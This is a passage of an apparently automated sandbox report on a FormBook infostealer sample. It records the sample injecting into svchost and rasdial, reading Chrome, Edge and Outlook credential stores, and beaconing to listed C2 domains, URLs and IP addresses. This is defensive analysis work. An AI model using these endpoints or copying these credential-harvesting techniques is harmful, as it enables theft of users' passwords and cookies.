                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 1224Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DA9008Jump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001187B1 LogonUserW,0_2_001187B1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000C3B3A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000C48D7
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00124C27 mouse_event,0_2_00124C27
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fFoOcuxK7M.exe"Jump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00117CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00117CAF
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0011874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0011874B
                Source: fFoOcuxK7M.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: fFoOcuxK7M.exe, TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: TrOCMVbhcDRPP.exe, 00000006.00000002.3385169487.0000000001A40000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000006.00000000.2378417014.0000000001A41000.00000002.00000001.00040000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522083057.0000000001331000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E862B cpuid 0_2_000E862B
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_000F4E87
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00101E06 GetUserNameW,0_2_00101E06
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_000F3F3A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000C49A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: fFoOcuxK7M.exeBinary or memory string: WIN_81
                Source: fFoOcuxK7M.exeBinary or memory string: WIN_XP
                Source: fFoOcuxK7M.exeBinary or memory string: WIN_XPe
                Source: fFoOcuxK7M.exeBinary or memory string: WIN_VISTA
                Source: fFoOcuxK7M.exeBinary or memory string: WIN_7
                Source: fFoOcuxK7M.exeBinary or memory string: WIN_8
                Source: fFoOcuxK7M.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00136283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00136283
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00136747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00136747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		2
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588135 Sample: fFoOcuxK7M.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.egldfi.xyz 2->28 30 www.lgdiamonds.info 2->30 32 9 other IPs or domains 2->32 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Binary is likely a compiled AutoIt script file 2->46 50 2 other signatures 2->50 10 fFoOcuxK7M.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 TrOCMVbhcDRPP.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 TrOCMVbhcDRPP.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.lgdiamonds.info 130.185.109.77, 49996, 49997, 49998 XIRRADE Germany 22->34 36 gtml.huksa.huhusddfnsuegcdn.com 23.167.152.41, 49958, 80 ESVC-ASNUS Reserved 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                fFoOcuxK7M.exe61%VirustotalBrowse
                fFoOcuxK7M.exe79%ReversingLabsWin32.Trojan.AutoitInject
                fFoOcuxK7M.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.lgdiamonds.info/cv1w/0%Avira URL Cloudsafe
                http://www.jalan2.online/lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.jalan2.online0%Avira URL Cloudsafe
                http://www.bcg.services/5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.43kdd.top/bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.bcg.services/5onp/0%Avira URL Cloudsafe
                http://www.43kdd.top/bsyy/0%Avira URL Cloudsafe
                http://www.75178.club/vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM=0%Avira URL Cloudsafe
                http://www.lgdiamonds.info/cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj20%Avira URL Cloudsafe
                http://www.jalan2.online/lvda/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.lgdiamonds.info
                		130.185.109.77
                		truefalse
                  		high
                  43kdd.top
                  		154.23.178.231
                  		truefalse
                    		unknown
                    jalan2.online
                    		108.181.189.7
                    		truefalse
                      		high
                      gtml.huksa.huhusddfnsuegcdn.com
                      		23.167.152.41
                      		truefalse
                        		high
                        www.bcg.services
                        		13.248.169.48
                        		truefalse
                          		high
                          www.75178.club
                          		unknown
                          		unknownfalse
                            		high
                            www.jalan2.online
                            		unknown
                            		unknownfalse
                              		high
                              www.egldfi.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.betmatchx.online
                                		unknown
                                		unknownfalse
                                  		high
                                  www.43kdd.top
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.jalan2.online/lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj2false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.lgdiamonds.info/cv1w/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.43kdd.top/bsyy/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jalan2.online/lvda/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.43kdd.top/bsyy/?grix=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVs1zZ2HmJ/p0t/zKv7OSTrBDtbJtNF3YKND91rSNX8lR/VDEldzg=&jxk=HtO4sxDXWj2false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.bcg.services/5onp/false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.bcg.services/5onp/?grix=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VW2Tte7Ln6/KpqGbSDXjhArBxXysrtN2DmXd3Va6ONamRXh2vEM=&jxk=HtO4sxDXWj2false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.75178.club/vl4d/?jxk=HtO4sxDXWj2&grix=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3k9iw4Eb0W9eqh06xomc0IPDFwjqEVOXfa2YeBvnOQ4os/FobUM=false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.lgdiamonds.info/cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj2false
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabrasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icorasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.jalan2.onlineTrOCMVbhcDRPP.exe, 00000009.00000002.3387326168.0000000005182000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000007.00000003.2636798603.00000000079EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      130.185.109.77
                                                      		www.lgdiamonds.infoGermany
                                                      		51191XIRRADEfalse
                                                      13.248.169.48
                                                      		www.bcg.servicesUnited States
                                                      		16509AMAZON-02USfalse
                                                      23.167.152.41
                                                      		gtml.huksa.huhusddfnsuegcdn.comReserved
                                                      		395774ESVC-ASNUSfalse
                                                      108.181.189.7
                                                      		jalan2.onlineCanada
                                                      		852ASN852CAfalse
                                                      154.23.178.231
                                                      		43kdd.topUnited States
                                                      		174COGENT-174USfalse

                                                      General Information

                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1588135
                                                      Start date and time:2025-01-10 21:45:04 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 13s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:9
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:fFoOcuxK7M.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:048a70dd4178e419339f012d993772ada047ca8222cae372e716e41e2a43545c.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@7/5
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 85%
                                                      • Number of executed functions: 50
                                                      • Number of non-executed functions: 278
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
